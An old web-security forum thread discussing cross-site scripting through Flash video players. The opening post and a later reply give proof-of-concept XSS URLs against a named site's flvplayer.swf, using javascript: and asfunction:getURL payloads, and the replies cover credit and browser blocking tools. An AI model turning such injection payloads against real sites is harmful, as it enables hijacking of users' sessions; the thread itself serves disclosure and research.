Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS using Flash
Posted by: 3ric
Date: June 29, 2007 08:07AM

Just one example XSS with Flash video players: http://www.zoominfo.com/About/m/video/flvplayer.swf?file=http://www.zoominfo.com/About/m/video/russ_demo2007.flv&image=javascript:alert(document.domain);//.jpg

I love Flash for it's obscureness =)

Options: ReplyQuote
Re: XSS using Flash
Posted by: thornmaker
Date: June 29, 2007 08:44AM

nice find... what bothers me is that the XSS still fires even though I have flashblock (v. 1.5.3.1) installed... i guess it only blocks the visual display of the flash until i click on it, not the execution of the flash code... ggrrr...

Options: ReplyQuote
Re: XSS using Flash
Posted by: WhiteAcid
Date: June 29, 2007 08:57AM

Indeed, I thought flasblock would block that :O

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: XSS using Flash
Posted by: 3ric
Date: June 29, 2007 09:30AM

Interesting enough, it doesn't seem to work with Safari 3 (Win and MacOS) as well as IE 7 but with Opera and Firefox.

Correction: Works in Safari when using Flashs asfunction. Thanks to Wisec for pointing that out (see below): http://www.zoominfo.com/About/m/video/flvplayer.swf?file=http://www.zoominfo.com/About/m/video/russ_demo2007.flv&image=asfunction:getURL,javascript:alert(document.domain);//.jpg



Edited 2 time(s). Last edit at 06/29/2007 11:10AM by 3ric.

Options: ReplyQuote
Re: XSS using Flash
Posted by: ascii
Date: June 29, 2007 10:01AM

just to give credits when a technique is new, this XSS stuff (on fash videos) has been discovered by Stefano di Paola at Owasp Milan

thanks 3ric to make people aware of these techniques by giving some examples : )

---
ascii
ush.it



Edited 1 time(s). Last edit at 06/29/2007 10:02AM by ascii.

Options: ReplyQuote
Re: XSS using Flash
Posted by: 3ric
Date: June 29, 2007 10:46AM

> just to give credits when a technique is new, this
> XSS stuff (on fash videos) has been discovered by
> Stefano di Paola at Owasp Milan

Of course, sorry for forgetting to mention that. Stefanos research on flash security is a must read for all web security researchers. You can find his OWASP slides at his page http://www.wisec.it/sectou.php?id=464dd35c8c5ad

Nonetheless there has to be more research on that topic since Flash insecurity is a real big threat.

Options: ReplyQuote
Re: XSS using Flash
Posted by: ma1
Date: June 29, 2007 11:39AM

thornmaker Wrote:
-------------------------------------------------------
> nice find... what bothers me is that the XSS still
> fires even though I have flashblock (v. 1.5.3.1)
> installed... i guess it only blocks the visual
> display of the flash until i click on it, not the
> execution of the flash code... ggrrr...

That's exactly what it does.
On the other hand, it's been honestly designed and advertised as an annoyance blocker, not as a security tool.
But on the 3rd hand ;) I'm quite surprised that you still use FlashBlock, while you can effectively (as in "don't load/don't run") block Flash and other plugins with NoScript :p

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: XSS using Flash
Date: July 01, 2007 06:27PM

ma1 Wrote:
-------------------------------------------------------
> That's exactly what it does.
> On the other hand, it's been honestly designed and
> advertised as an annoyance blocker, not as a
> security tool.
> But on the 3rd hand ;) I'm quite surprised that
> you still use FlashBlock, while you can
> effectively (as in "don't load/don't run") block
> Flash and other plugins with NoScript :p

I was happy that NoScript does that. That day I uninstalled FlashBlock and now flash content is blocked and its effortless to enable them if I want. =oD

Options: ReplyQuote


Sorry, only registered users may post in this forum.